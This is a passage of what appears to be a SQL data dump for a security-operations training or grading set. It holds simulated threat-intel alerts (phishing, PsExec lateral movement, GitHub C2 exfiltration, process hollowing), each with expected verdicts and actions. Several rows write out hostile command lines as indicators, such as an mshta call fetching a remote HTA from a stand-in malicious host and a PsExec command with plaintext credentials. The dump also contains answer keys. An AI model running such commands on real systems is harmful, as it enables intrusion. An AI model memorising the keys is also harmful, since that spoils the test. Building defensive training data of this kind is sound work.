strategies.\"}', 'Advanced', 'MAL', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.4.6.50\\\",\\\"dst_ip\\\":\\\"10.4.6.51\\\",\\\"username\\\":\\\"finance.mgr\\\",\\\"hostname\\\":\\\"Finance-PC-11\\\",\\\"command_line\\\":\\\"mshta http://malicious-site.com/malicious.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1421, 'APT41 Spear-Phishing Campaign Targeting Energy Sector', 'critical', 'MISP', 'A spear-phishing email was detected attempting to deliver a fileless malware payload using a malicious link. The campaign is attributed to APT41.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01.energycorp.local\",\"email_sender\":\"alert@energy-updates.com\",\"url\":\"http://malicious-update.com/download?file=update.exe\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-update.com/download?file=update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malware for phishing campaign\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alert@energy-updates.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with known phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains indicators of a known APT41 phishing campaign targeting energy sector employees.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01.energycorp.local\\\",\\\"email_sender\\\":\\\"alert@energy-updates.com\\\",\\\"url\\\":\\\"http://malicious-update.com/download?file=update.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1422, 'Lazarus Group Lateral Movement Detected via PSExec', 'high', 'ThreatConnect', 'Suspicious lateral movement activity detected using PSExec from an internal IP associated with the Lazarus Group.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T13:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"server01.energycorp.local\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.15 -u admin -p password cmd.exe\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.15 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command used for unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for lateral movement matches known techniques used by the Lazarus Group.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.970Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01.energycorp.local\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.15 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1423, 'Fancy Bear Data Exfiltration via GitHub C2', 'critical', 'Anomali', 'Data exfiltration detected using a GitHub repository for C2 communication. Activity attributed to Fancy Bear/APT28.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T16:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"140.82.112.4\",\"username\":\"analyst\",\"hostname\":\"workstation02.energycorp.local\",\"url\":\"https://github.com/user/repo\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used in exfiltration activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://github.com/user/repo\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"GitHub repository used as C2 channel\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Detected exfiltration matches Fancy Bear\'s use of GitHub for covert C2 operations.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"140.82.112.4\\\",\\\"username\\\":\\\"analyst\\\",\\\"hostname\\\":\\\"workstation02.energycorp.local\\\",\\\"url\\\":\\\"https://github.com/user/repo\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1424, 'Suspicious Login Attempts from Tor Exit Node', 'medium', 'Recorded Future', 'Multiple failed login attempts detected from a known Tor exit node. Investigation indicates benign activity.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.220.101.19\",\"dst_ip\":\"192.168.3.5\",\"username\":\"guest\",\"hostname\":\"gateway.energycorp.local\",\"failed_attempts\":12}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.19\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP identified as Tor exit node, possibly used for benign purposes\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts originated from a Tor exit node. No further malicious activity detected, indicating a likely false alarm.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:54:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:53:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:52:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-02T13:51:06.973Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.220.101.19\\\",\\\"dst_ip\\\":\\\"192.168.3.5\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"gateway.energycorp.local\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1425, 'Cozy Bear Fileless Malware Detected via Process Hollowing', 'critical', 'MISP', 'A fileless malware attack using process hollowing was detected, attributed to Cozy Bear/APT29. Activity involved advanced evasion techniques.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"\",\"username\":\"sysadmin\",\"hostname\":\"server02.energycorp.local\",\"command_line\":\"rundll32.exe hollowed.dll,EntryPoint\"}', '2026-03-02 03:16:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"rundll32.exe hollowed.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicative of process hollowing technique\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious process\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of process hollowing aligns with known Cozy Bear tactics for stealthy attacks.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.975Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:50:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"sysadmin\\\",\\\"hostname\\\":\\\"server02.energycorp.local\\\",\\\"command_line\\\":\\\"rundll32.exe hollowed.dll,EntryPoint\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1426, 'Memory-only Rootkit Detected in LSASS Process', 'critical', 'CrowdStrike', 'A memory-only rootkit was detected within LSASS process memory on a critical ICS server, potentially used for credential theft and lateral movement.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.85\",\"username\":\"admin_user\",\"hostname\":\"ICS-Server-01\",\"command_line\":\"rundll32.exe shell32.dll,Control_RunDLL\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for C2 server activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal admin account\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rundll32.exe shell32.dll,Control_RunDLL\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used for process injection\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a memory-only rootkit in LSASS indicates potential credential theft and lateral movement.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 